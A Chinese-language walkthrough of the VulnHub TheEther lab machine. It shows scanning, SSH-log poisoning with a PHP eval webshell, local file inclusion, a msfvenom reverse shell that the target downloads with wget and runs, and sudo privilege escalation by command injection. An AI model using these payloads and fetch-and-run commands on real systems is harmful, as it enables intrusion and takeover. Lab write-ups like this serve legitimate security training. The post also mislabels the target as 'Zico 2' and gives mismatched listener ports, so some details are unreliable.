Vulhub TheEther_1.0.1靶机详解

项目地址

plain 复制代码
https://download.vulnhub.com/theether/theEther_1.0.1.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

plain 复制代码
nmap 192.168.47.1-254

根据对比可知theEther的一个ip地址为192.168.47.164

扫描Zico 2的操作系统,端口及对应服务

plain 复制代码
nmap -A -p- 192.168.47.164

发现开放22,80端口

目录扫描

plain 复制代码
dirb http://192.168.47.164

访问网站获取敏感信息

在About us这里疑似存在文件包含漏洞

由敏感信息可知其服务器中间件是apache,文件包含可通过日志文件包含获权

尝试拼接默认目录 -> /var/log/auth.log路径无法访问,存在报错

尝试利用ssh登录报错注入进错误访问日志中

plain 复制代码
ssh "<?php eval($_GET[cmd]);?>"@192.168.47.164

尝试burp抓包,查看数据包信息

发送到Repeater模块,拼接日志路径

获取shell

拼接命令

plain 复制代码
&d1no

打开kali,利用msf生成shell -> 同时打开msf的内部监听

plain 复制代码
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.47.129 LPORT=4444 -f elf > shell.elf
plain 复制代码
msfconsole
 
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.47.129
set lport 7272

新启一个http临时服务,让靶机远程下载shell.elf文件

plain 复制代码
python -m http.server 2429
plain 复制代码
/?file=/var/log/auth.log&d1no=system('wget+192.168.47.129:2429/shell.elf');
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf');
/?file=/var/log/auth.log&d1no=system('./shell.elf');

监听成功

提权

获得可交互式shell

plain 复制代码
shell
python -c 'import pty;pty.spawn("/bin/bash")'

查看可利用提权

plain 复制代码
sudo -l
plain 复制代码
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

提权成功

相关推荐
索然无味io31 分钟前
组件框架漏洞
前端·笔记·学习·安全·web安全·网络安全·前端框架
Z3r4y4 小时前
【钓鱼】基于office的一些钓鱼技法
网络安全·office·钓鱼·宏病毒
仇辉攻防10 小时前
【云安全】云原生-Docker(五)容器逃逸之漏洞利用
安全·web安全·网络安全·docker·云原生·容器·安全性测试
vortex515 小时前
Windows 靶机常见服务、端口及枚举工具与方法全解析:SMB、LDAP、NFS、RDP、WinRM、DNS
windows·网络安全·渗透测试
hcja66620 小时前
CVE-2024-23897-Jenkins任意文件读取漏洞复现
运维·web安全·网络安全·中间件·jenkins
网安加社区21 小时前
网安加·百家讲坛 | 樊山:数据安全之威胁建模
网络安全·数据安全·威胁建模
vbsecvey1 天前
SWPU 2022 新生赛--web题
安全·web安全·网络安全
网络安全工程师老王1 天前
Spring FatJar写文件到RCE分析
web安全·网络安全·信息安全
扣脚大汉在网络2 天前
CVE-2025-0411 7-zip 漏洞复现
网络安全·漏洞